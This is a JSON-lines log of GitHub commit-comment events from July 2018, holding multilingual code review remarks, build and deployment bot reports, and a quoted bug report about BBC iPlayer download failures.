{"id":"7932243944","type":"CommitCommentEvent","actor":{"login":"Dasc3er"},"repo":{"name":"devcode-it/openstamanager"},"payload":{"comment":{"id":29629412,"position":null,"line":null,"path":null,"commit_id":"0b9f6fd2ca155b1a1acc946cb282f61894617b5e","created_at":"2018-07-07T12:02:51Z","updated_at":"2018-07-07T12:02:51Z","author_association":"CONTRIBUTOR","body":"@devcode-it/openstamanager Ho sostituito il sistema di messaggi per l'utente (infos, warnings, errors) impostato manualmente con uno maggiormente ampliabile, che gestisce automatizzato la rimozione dei messaggi precedenti e l'aggiunta di eventuali nuovi. Si potrebbero verificare dei problemi di compatibilità in casi particolari in cui vengono effettuati troppi redirect (in qualche plugin impostato erronemente).\r\n\r\n@lucasalva87 Il codice dei nuovi moduli **Gestione documentale** e **Categorie documenti** ha bisogno di una praticamente completa riscrittura per adeguarlo ai nuovi standard."}},"created_at":"2018-07-07T12:02:51Z"}
{"id":"7932244455","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629414,"position":11,"line":11,"path":"src/App.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T12:03:16Z","updated_at":"2018-07-07T12:03:16Z","author_association":"NONE","body":"А здесь можно просто писать export default class"}},"created_at":"2018-07-07T12:03:16Z"}
{"id":"7932245570","type":"CommitCommentEvent","actor":{"login":"Ho9Nyang"},"repo":{"name":"Ho9Nyang/PSWebCodingDesigner"},"payload":{"comment":{"id":29629416,"position":2,"line":2,"path":"main.js","commit_id":"6c04099c4d5ef75fd4d46f0f99025b5ae6350d16","created_at":"2018-07-07T12:04:21Z","updated_at":"2018-07-07T12:04:21Z","author_association":"OWNER","body":"연습이에요"}},"created_at":"2018-07-07T12:04:21Z"}
{"id":"7932246852","type":"CommitCommentEvent","actor":{"login":"craigh"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29629421,"position":null,"line":null,"path":null,"commit_id":"44d65785b0623acfbd5a8699de23fc6e549135cb","created_at":"2018-07-07T12:05:26Z","updated_at":"2018-07-07T12:05:26Z","author_association":"MEMBER","body":"I couldn't remember when it started and I noticed a change in this commit"}},"created_at":"2018-07-07T12:05:26Z"}
{"id":"7932247165","type":"CommitCommentEvent","actor":{"login":"Ho9Nyang"},"repo":{"name":"Ho9Nyang/PSWebCodingDesigner"},"payload":{"comment":{"id":29629422,"position":null,"line":null,"path":null,"commit_id":"6c04099c4d5ef75fd4d46f0f99025b5ae6350d16","created_at":"2018-07-07T12:05:41Z","updated_at":"2018-07-07T12:05:41Z","author_association":"OWNER","body":"연습했습니다"}},"created_at":"2018-07-07T12:05:41Z"}
{"id":"7932247579","type":"CommitCommentEvent","actor":{"login":"SiewYan"},"repo":{"name":"SiewYan/PandaAnalysis"},"payload":{"comment":{"id":29629423,"position":19,"line":35,"path":"LPC_T3/lpc_setup.sh","commit_id":"0b5fa4389c345299bd4ae445f68e0620d1096947","created_at":"2018-07-07T12:06:04Z","updated_at":"2018-07-07T12:06:04Z","author_association":"OWNER","body":"lack writing permission in /uscms_data/d3/lpcmetx/panda/80X-v1dot0/boosted/flat, rerouting to my own home folder"}},"created_at":"2018-07-07T12:06:04Z"}
{"id":"7932247637","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629424,"position":15,"line":15,"path":"src/App.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T12:06:07Z","updated_at":"2018-07-07T12:06:07Z","author_association":"NONE","body":"Аааа)) Кошмар))) Низя таблицами)))"}},"created_at":"2018-07-07T12:06:07Z"}
{"id":"7932248828","type":"CommitCommentEvent","actor":{"login":"Bosebcc"},"repo":{"name":"Bosebcc/Realsat"},"payload":{"comment":{"id":29629427,"position":23,"line":278,"path":"master/MasterSun_Servo.py","commit_id":"5d83d6610ec7b3e4a8d162d02fdad74311a7c2ae","created_at":"2018-07-07T12:07:07Z","updated_at":"2018-07-07T12:07:07Z","author_association":"OWNER","body":"Else can't have an argument following it so  @nattzkungz \r\n\r\nelse:\r\n"}},"created_at":"2018-07-07T12:07:07Z"}
{"id":"7932249699","type":"CommitCommentEvent","actor":{"login":"Bosebcc"},"repo":{"name":"Bosebcc/Realsat"},"payload":{"comment":{"id":29629432,"position":17,"line":272,"path":"master/MasterSun_Servo.py","commit_id":"5d83d6610ec7b3e4a8d162d02fdad74311a7c2ae","created_at":"2018-07-07T12:07:51Z","updated_at":"2018-07-07T12:07:51Z","author_association":"OWNER","body":"@nattzkungz you need to put \"and\" and variable \r\n\r\nFix:\r\nelif uvIrradiance <= 0.89 and uvIrradiance > 0.67 :"}},"created_at":"2018-07-07T12:07:51Z"}
{"id":"7932251622","type":"CommitCommentEvent","actor":{"login":"Abhay0001"},"repo":{"name":"Abhay0001/Simple_RNNs"},"payload":{"comment":{"id":29629437,"position":null,"line":null,"path":null,"commit_id":"b854d66da76c5b3c45b5369e984d05baa997de2b","created_at":"2018-07-07T12:09:42Z","updated_at":"2018-07-07T12:09:42Z","author_association":"OWNER","body":"okay! all the best"}},"created_at":"2018-07-07T12:09:42Z"}
{"id":"7932251870","type":"CommitCommentEvent","actor":{"login":"ian02054"},"repo":{"name":"Ascoware/get-iplayer-automator"},"payload":{"comment":{"id":29629439,"position":null,"line":null,"path":null,"commit_id":"f3c799f799aa2867532a9ecf12a34df0cb64a291","created_at":"2018-07-07T12:09:56Z","updated_at":"2018-07-07T12:09:56Z","author_association":"NONE","body":"I have the same problem ( no vpn used)..went back to prior version, and\ndownloads work fine\n\nOn Sat, Jul 7, 2018, 07:43 ManolisGledsodakis <notifications@github.com>\nwrote:\n\n> Sorry if I'm in the wrong place. If I am, where should I report issues?\n> Since updating to 1.13.11 today, ITV is OK but GiA doesn't download BBC.\n> This *could* be a VPN problem at my end but I have no way of telling.\n> Grateful for any helpful comments.\n>\n> BBC Download (ID=b0b9fs4q): Downloading Click - Inside MIT's AI Workshop\n> INFO: 1 total programmes\n> ERROR: Failed to download URL (3/3):\n> https://open.live.bbc.co.uk/mediaselector/5/select/version/2.0/mediaset/iptv-all/vpid/b0b9frz8?cb=60193\n> ERROR: Response: 500 Can't connect to open.live.bbc.co.uk:443\n> ERROR: Failed to download URL (3/3):\n> https://open.live.bbc.co.uk/mediaselector/5/select/version/2.0/mediaset/pc/vpid/b0b9frz8?cb=41723\n> ERROR: Response: 500 Can't connect to open.live.bbc.co.uk:443\n> ERROR: Failed to download URL (3/3):\n> https://open.live.bbc.co.uk/mediaselector/5/select/version/2.0/mediaset/apple-ipad-hls/vpid/b0b9frz8?cb=26014\n> ERROR: Response: 500 Can't connect to open.live.bbc.co.uk:443\n> WARNING: No media streams found for requested programme versions and\n> recording modes.\n> WARNING: The programme may no longer be available - check the iPlayer site.\n> WARNING: If you are outside the UK, check with the provider to find out if\n> your VPN/VPS/Smart DNS/web proxy has been blocked.\n> BBC Download (ID=b0b9fs4q): Click - Inside MIT's AI Workshop Failed\n> AppController: Downloads Finished\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Ascoware/get-iplayer-automator/commit/f3c799f799aa2867532a9ecf12a34df0cb64a291#commitcomment-29629360>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQcR5p089Q0xqDLxlMnZCxum_zFFYHmrks5uEJ7QgaJpZM4VGVKY>\n> .\n>\n"}},"created_at":"2018-07-07T12:09:56Z"}
{"id":"7932252626","type":"CommitCommentEvent","actor":{"login":"emotality"},"repo":{"name":"eston-p/immedia"},"payload":{"comment":{"id":29629440,"position":13,"line":42,"path":"src/immedia/app/Http/Controllers/SearchController.php","commit_id":"cdf69f3aaffb7a8dec5e75da4450d5bab94f643e","created_at":"2018-07-07T12:10:33Z","updated_at":"2018-07-07T12:10:33Z","author_association":"NONE","body":"Any reason for this?"}},"created_at":"2018-07-07T12:10:33Z"}
{"id":"7932253254","type":"CommitCommentEvent","actor":{"login":"Abhay0001"},"repo":{"name":"Abhay0001/Simple_RNNs"},"payload":{"comment":{"id":29629442,"position":null,"line":null,"path":null,"commit_id":"3c034368f4beadfd925a3d5d5d0120d13d982dc1","created_at":"2018-07-07T12:11:06Z","updated_at":"2018-07-07T12:11:06Z","author_association":"OWNER","body":"Can You Save the trained model for future re-training?"}},"created_at":"2018-07-07T12:11:06Z"}
{"id":"7932254011","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29629444,"position":null,"line":null,"path":null,"commit_id":"8de0451a3dd6d14e265daaf62445d445a1026b78","created_at":"2018-07-07T12:11:43Z","updated_at":"2018-07-07T12:11:43Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180707-121142 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180707-121142\") to [dev](https://console.bluemix.net/apps/6fd8391d-0cdd-414d-8345-ae8a2ead0e5d?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-07T12:11:43Z"}
{"id":"7932255255","type":"CommitCommentEvent","actor":{"login":"Bosebcc"},"repo":{"name":"Bosebcc/Realsat"},"payload":{"comment":{"id":29629445,"position":17,"line":272,"path":"master/MasterSun_Servo.py","commit_id":"5d83d6610ec7b3e4a8d162d02fdad74311a7c2ae","created_at":"2018-07-07T12:12:46Z","updated_at":"2018-07-07T12:12:46Z","author_association":"OWNER","body":"![screen shot 2561-07-07 at 19 09 55](https://user-images.githubusercontent.com/32533504/42410760-7e49dfc8-8219-11e8-808c-21b3c6395a83.png)\r\nVariable is not the  @nattzkungz \r\n\r\nFix:print \"Uv Irradiance: \" + str(uvIrradiance)"}},"created_at":"2018-07-07T12:12:46Z"}
{"id":"7932255978","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29629447,"position":10,"line":5,"path":"lesson8/passenger_wagon.rb","commit_id":"747cdcad6b575376eb75c85263b4174e2bc5bac7","created_at":"2018-07-07T12:13:16Z","updated_at":"2018-07-07T12:13:16Z","author_association":"NONE","body":"Раз ты знаешь, что по одному, то зачем принимать аргументы?"}},"created_at":"2018-07-07T12:13:16Z"}
{"id":"7932257075","type":"CommitCommentEvent","actor":{"login":"belraptor"},"repo":{"name":"belraptor/myRep"},"payload":{"comment":{"id":29629449,"position":null,"line":null,"path":null,"commit_id":"6748d553be1a163e25307b63f78f870d6a5f6619","created_at":"2018-07-07T12:14:05Z","updated_at":"2018-07-07T12:14:05Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-07T12:14:05Z"}
{"id":"7932258478","type":"CommitCommentEvent","actor":{"login":"bugLordFPT"},"repo":{"name":"bugLordFPT/hello_Work"},"payload":{"comment":{"id":29629456,"position":null,"line":null,"path":null,"commit_id":"dd1c7295652a774141021dc25b85386463886fc2","created_at":"2018-07-07T12:15:14Z","updated_at":"2018-07-07T12:15:14Z","author_association":"OWNER","body":"printf(\"hello work\");"}},"created_at":"2018-07-07T12:15:14Z"}
{"id":"7932259242","type":"CommitCommentEvent","actor":{"login":"bugLordFPT"},"repo":{"name":"bugLordFPT/hello_Work"},"payload":{"comment":{"id":29629462,"position":2,"line":2,"path":"README.md","commit_id":"dd1c7295652a774141021dc25b85386463886fc2","created_at":"2018-07-07T12:15:54Z","updated_at":"2018-07-07T12:15:54Z","author_association":"OWNER","body":"printf(\"hello work\");"}},"created_at":"2018-07-07T12:15:54Z"}
{"id":"7932260868","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29629463,"position":10,"line":10,"path":"main.rb","commit_id":"db1db5143893240c7bc008c7341f4683374377fc","created_at":"2018-07-07T12:17:19Z","updated_at":"2018-07-07T12:17:19Z","author_association":"NONE","body":"ответь на вопросы заданные 2 занятия назад"}},"created_at":"2018-07-07T12:17:19Z"}
{"id":"7932261153","type":"CommitCommentEvent","actor":{"login":"marcin2447"},"repo":{"name":"marcin2447/Arkanoid-game"},"payload":{"comment":{"id":29629464,"position":null,"line":null,"path":null,"commit_id":"b4036a0a11f3fd4e4f50df8381c8eac563597c45","created_at":"2018-07-07T12:17:34Z","updated_at":"2018-07-07T12:17:34Z","author_association":"OWNER","body":"l;"}},"created_at":"2018-07-07T12:17:34Z"}
{"id":"7932261671","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29629465,"position":12,"line":12,"path":"main.rb","commit_id":"db1db5143893240c7bc008c7341f4683374377fc","created_at":"2018-07-07T12:18:05Z","updated_at":"2018-07-07T12:18:05Z","author_association":"NONE","body":"а `@user` он здесь откуда взялся ?"}},"created_at":"2018-07-07T12:18:05Z"}
{"id":"7932262724","type":"CommitCommentEvent","actor":{"login":"zmicier99"},"repo":{"name":"zmicier99/zmicier99.github.io"},"payload":{"comment":{"id":29629467,"position":null,"line":null,"path":null,"commit_id":"694e8f170c9fb3ec3553fb0a1eb4bccfffb96078","created_at":"2018-07-07T12:19:02Z","updated_at":"2018-07-07T12:19:02Z","author_association":"OWNER","body":"ДНК и РНК это последовательности нуклеотидов.\r\n\r\nЧетыре нуклеотида в ДНК это аденин (A), цитозин (C), гуанин (G) и тимин (T).\r\n\r\nЧетыре нуклеотида в РНК это аденин (A), цитозин (C), гуанин (G) и урацил (U).\r\n\r\nЦепь РНК составляется на основе цепи ДНК последовательной заменой каждого нуклеотида:\r\n\r\nG -> C\r\nC -> G\r\nT -> A\r\nA -> U\r\ndnaToRna.js\r\nРеализуйте и экспортируйте функцию по умолчанию, которая принимает на вход цепь ДНК и возвращает соответствующую цепь РНК (совершает транскрипцию РНК).\r\n\r\nЕсли во входном параметре нет ни одного нуклеотида (т.е. передана пустая строка), то функция должна вернуть пустую строку. Если в переданной цепи ДНК встретится \"незнакомый\" нуклеотид (не являющийся одним из четырех перечисленных выше), то функция должна вернуть null.\r\n\r\ndnaToRna('ACGTGGTCTTAA'); // 'UGCACCAGAAUU'\r\ndnaToRna('CCGTA'); // 'GGCAU'\r\ndnaToRna(''); // ''\r\ndnaToRna('ACNTG'); // null"}},"created_at":"2018-07-07T12:19:02Z"}
{"id":"7932263338","type":"CommitCommentEvent","actor":{"login":"sbrannen"},"repo":{"name":"junit-team/junit5"},"payload":{"comment":{"id":29629468,"position":37,"line":52,"path":"junit-platform-engine/src/main/java/org/junit/platform/engine/support/hierarchical/ThrowableCollector.java","commit_id":"1cae871204775b372e37457768383b1a0c64705f","created_at":"2018-07-07T12:19:37Z","updated_at":"2018-07-07T12:19:37Z","author_association":"MEMBER","body":"Throwables --> Throwable (no \"s\") 😉 "}},"created_at":"2018-07-07T12:19:37Z"}
{"id":"7932263621","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29629469,"position":19,"line":72,"path":"src/AsyncUsart.cpp","commit_id":"7c2774f13caf631b6c9e40ff5cf7b189337fbcf5","created_at":"2018-07-07T12:19:50Z","updated_at":"2018-07-07T12:19:50Z","author_association":"OWNER","body":"Как-то не очень логично получается. Этот объект даже не знает, нужно реммапиться или нет, просто он это делает, потому что почему-то должен. И в том числе, он не узнает результат этой операции. В общем, какой-то костыль. Надо будет отрефакторить."}},"created_at":"2018-07-07T12:19:50Z"}
{"id":"7932263647","type":"CommitCommentEvent","actor":{"login":"cui-kang"},"repo":{"name":"cui-kang/python-spider"},"payload":{"comment":{"id":29629470,"position":1,"line":1,"path":"README.md","commit_id":"c819fb1ea13f10e93799c7a82a0850941a196ca1","created_at":"2018-07-07T12:19:52Z","updated_at":"2018-07-07T12:19:52Z","author_association":"OWNER","body":"使用 python3"}},"created_at":"2018-07-07T12:19:52Z"}
{"id":"7932264243","type":"CommitCommentEvent","actor":{"login":"Jagailo"},"repo":{"name":"Jagailo/TestingSystem"},"payload":{"comment":{"id":29629472,"position":null,"line":null,"path":null,"commit_id":"e494f264af8bc596adb92a03da08abf477fb58e7","created_at":"2018-07-07T12:20:17Z","updated_at":"2018-07-07T12:20:17Z","author_association":"OWNER","body":"@vyshka autocorrection...\r\nI'll not correct typos in the description of the commits."}},"created_at":"2018-07-07T12:20:17Z"}
{"id":"7932265330","type":"CommitCommentEvent","actor":{"login":"reloxx13"},"repo":{"name":"reloxx13/TasmoAdmin"},"payload":{"comment":{"id":29629473,"position":null,"line":null,"path":null,"commit_id":"6e894b83b9fbc6783049d7758ba8e1961e9365a3","created_at":"2018-07-07T12:21:11Z","updated_at":"2018-07-07T12:21:11Z","author_association":"OWNER","body":"haha dude i just tested the same in docker dev right now xD"}},"created_at":"2018-07-07T12:21:11Z"}
{"id":"7932274358","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629497,"position":null,"line":null,"path":null,"commit_id":"ca2d4a2e971a806d2c70532c98aa0e28ccacef73","created_at":"2018-07-07T12:28:25Z","updated_at":"2018-07-07T12:28:25Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2746 of 2932 tests passed, 74 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 205 tests had: EIO diffs.\n * 164 tests had: ESO small diffs.\n * 173 tests had: Table big diffs.\n * 102 tests had: MTR small diffs.\n * 71 tests had: ESO big diffs.\n * 35 tests had: MTR big diffs.\n * 24 tests had: Table small diffs.\n * 9 tests had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 437\n * Failed: 186\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.66%25-yellow.png)</a> \n"}},"created_at":"2018-07-07T12:28:25Z"}
{"id":"7932275198","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29629499,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-07T12:29:12Z","updated_at":"2018-07-07T12:29:12Z","author_association":"OWNER","body":"thanks, no, resubmitted 5+0.05"}},"created_at":"2018-07-07T12:29:12Z"}
{"id":"7932275429","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29629500,"position":85,"line":85,"path":"my_game.rb","commit_id":"db1db5143893240c7bc008c7341f4683374377fc","created_at":"2018-07-07T12:29:26Z","updated_at":"2018-07-07T12:29:26Z","author_association":"NONE","body":"метод же в 63 строке зачем ты в предикатвной форме переписал?\r\nя вижу, что я коммент на нем оставил в прошлый раз... видимо ошибся от усталости\r\nон же не возрвращает булево значение\r\nзачем его писать в такой форме?\r\nв том виде, как он сейчас - это неверно\r\nздесь было бы верно убрать из этого метода `open_cards if` и тогда метод будет выглядеть чудесно\r\nсоответсвенно в 40 строке написать:\r\n```ruby\r\nopen_cards if full_hands?\r\n```\r\nтак твой код станет более читаемым и более легко изменяемым"}},"created_at":"2018-07-07T12:29:26Z"}
{"id":"7932276007","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29629501,"position":65,"line":63,"path":"my_game.rb","commit_id":"db1db5143893240c7bc008c7341f4683374377fc","created_at":"2018-07-07T12:29:56Z","updated_at":"2018-07-07T12:29:56Z","author_association":"NONE","body":"см. через один комментарий"}},"created_at":"2018-07-07T12:29:56Z"}
{"id":"7932276672","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629505,"position":9,"line":9,"path":"Lesson3/route.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T12:30:22Z","updated_at":"2018-07-07T12:30:22Z","author_association":"NONE","body":"Последний комент касается всего кода в этом задании, (что-б не спамить этим коментом)"}},"created_at":"2018-07-07T12:30:22Z"}
{"id":"7932280013","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29629516,"position":null,"line":null,"path":null,"commit_id":"0fd22d6a91926335b08bcffb2cdf6ac11ab17e14","created_at":"2018-07-07T12:33:07Z","updated_at":"2018-07-07T12:33:07Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180707-123307 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180707-123307\") to [dev](https://console.bluemix.net/apps/6fd8391d-0cdd-414d-8345-ae8a2ead0e5d?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-07T12:33:07Z"}
{"id":"7932280073","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29629517,"position":38,"line":27,"path":"my_game.rb","commit_id":"db1db5143893240c7bc008c7341f4683374377fc","created_at":"2018-07-07T12:33:11Z","updated_at":"2018-07-07T12:33:11Z","author_association":"NONE","body":"со знаком вопроса пишут предикативные методы, т.е. возвращающие булево (\"тру\" или \"фолс\")... этот же метод не эту функцию выполняет"}},"created_at":"2018-07-07T12:33:11Z"}
{"id":"7932280583","type":"CommitCommentEvent","actor":{"login":"luckytyphlosion"},"repo":{"name":"pret/pokegold-spaceworld"},"payload":{"comment":{"id":29629519,"position":58,"line":58,"path":"hack/hack.asm","commit_id":"12af7aabb974980ef557eeca281f7fd818ec0d91","created_at":"2018-07-07T12:33:37Z","updated_at":"2018-07-07T12:33:37Z","author_association":"CONTRIBUTOR","body":"```\r\nld h, b\r\nld l, c\r\n```\r\nSame amount of bytes and less cycles."}},"created_at":"2018-07-07T12:33:37Z"}
{"id":"7932280964","type":"CommitCommentEvent","actor":{"login":"w4tsw4ts"},"repo":{"name":"w4tsw4ts/gedigital"},"payload":{"comment":{"id":29629520,"position":null,"line":null,"path":null,"commit_id":"f793664ee5e67f5668c25d28af588f50d3e6ebe4","created_at":"2018-07-07T12:34:00Z","updated_at":"2018-07-07T12:34:00Z","author_association":"OWNER","body":"fixed issues"}},"created_at":"2018-07-07T12:34:00Z"}
{"id":"7932281315","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29629521,"position":null,"line":null,"path":null,"commit_id":"fe61e6ef509911709089259e8b3a2c3098fb898b","created_at":"2018-07-07T12:34:19Z","updated_at":"2018-07-07T12:34:19Z","author_association":"NONE","body":"@K0H205 いいですね！この調子です！"}},"created_at":"2018-07-07T12:34:19Z"}
{"id":"7932281966","type":"CommitCommentEvent","actor":{"login":"dutiyesh"},"repo":{"name":"dutiyesh/comment-box"},"payload":{"comment":{"id":29629523,"position":4,"line":4,"path":"README.md","commit_id":"71a46d146662bea8d10bc118c1b1fc002f75e25b","created_at":"2018-07-07T12:34:54Z","updated_at":"2018-07-07T12:34:54Z","author_association":"OWNER","body":"Test message"}},"created_at":"2018-07-07T12:34:54Z"}
{"id":"7932282603","type":"CommitCommentEvent","actor":{"login":"etorreborre"},"repo":{"name":"etorreborre/specs2"},"payload":{"comment":{"id":29629525,"position":63,"line":63,"path":"guide/src/test/scala/org/specs2/guide/AddKeywords.scala","commit_id":"2fdbc7664d918e48b5f0d6b25ad576d09ff303bb","created_at":"2018-07-07T12:35:25Z","updated_at":"2018-07-07T12:35:25Z","author_association":"OWNER","body":"Thanks, I fixed it now on master. I will publish the new user guide soon now that 4.3.1 is out."}},"created_at":"2018-07-07T12:35:25Z"}
{"id":"7932283509","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629526,"position":15,"line":15,"path":"Lesson3/route.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T12:36:12Z","updated_at":"2018-07-07T12:36:12Z","author_association":"NONE","body":"можешь в параметрах писать просто station. Тот факт, что она промежуточная виден из имплементации. Аргументом приходит только одна станция, так-что детали состояния этой станции можно отпустить. Такая детализация имеет смысл, в конструкторе, где приходят 2 станции, и факт того, что одна из них отправная, а другая конечная важен в деталях реализации."}},"created_at":"2018-07-07T12:36:12Z"}
{"id":"7932285293","type":"CommitCommentEvent","actor":{"login":"hackiftekhar"},"repo":{"name":"hackiftekhar/IQKeyboardManager"},"payload":{"comment":{"id":29629528,"position":null,"line":null,"path":null,"commit_id":"9bb0f564c95fd6f015775c289f4d228658c006de","created_at":"2018-07-07T12:37:45Z","updated_at":"2018-07-07T12:37:45Z","author_association":"OWNER","body":"I checked my demo app with iPhone X and iPhone 5S Simulator, I tested in both settings `Use Safe Area Layout Guides` turned off and on and it works for all 4 configurations."}},"created_at":"2018-07-07T12:37:45Z"}
{"id":"7932288478","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629533,"position":27,"line":27,"path":"Lesson3/route.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T12:40:19Z","updated_at":"2018-07-07T12:40:19Z","author_association":"NONE","body":"Обрати внимание, что везде после того, как ты начал использовать названия станций вместо объектов везде добавляются дополнительные шаги конвертации. Это уже как-бы намекает на то, что что-то не правильно используется."}},"created_at":"2018-07-07T12:40:19Z"}
{"id":"7932292649","type":"CommitCommentEvent","actor":{"login":"craigh"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29629534,"position":null,"line":null,"path":null,"commit_id":"44d65785b0623acfbd5a8699de23fc6e549135cb","created_at":"2018-07-07T12:43:46Z","updated_at":"2018-07-07T12:43:46Z","author_association":"MEMBER","body":"@Guite apparently in 1.5 branch we are using a much older version of the Sensio package\r\n\r\nhttps://github.com/zikula/core/blob/fa48a5255e4f9de14a34d02ac1cf32f38ce598dc/composer.lock#L3869-L3870\r\n\r\nthis class https://github.com/sensiolabs/SensioFrameworkExtraBundle/blob/master/Configuration/Method.php\r\n\r\ndoesn't extend the other in the 3.0 branch "}},"created_at":"2018-07-07T12:43:46Z"}
{"id":"7932294180","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29629539,"position":null,"line":null,"path":null,"commit_id":"ca744f5816b0b0f2bd65bb6dd77d0944d0e606b4","created_at":"2018-07-07T12:45:09Z","updated_at":"2018-07-07T12:45:09Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180707-124508 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180707-124508\") to [dev](https://console.bluemix.net/apps/6fd8391d-0cdd-414d-8345-ae8a2ead0e5d?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-07T12:45:09Z"}
{"id":"7932294793","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629542,"position":27,"line":27,"path":"Lesson3/route.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T12:45:36Z","updated_at":"2018-07-07T12:45:36Z","author_association":"NONE","body":"Да, и ```@remove_station``` (который все равно уйдет), является инстэнс переменной. Инстэнс переменные имеют смысл, когда мы хотим сохранить состояние объекта между методами. А в данном случае у нас метод station_remove выстрелил -> станция удалилась -> переменная ```@remove_station``` продолжает существовать. В этом нет смысла (тем более, что ридера для нее нет, и прочитать ее уже невозможно)."}},"created_at":"2018-07-07T12:45:36Z"}
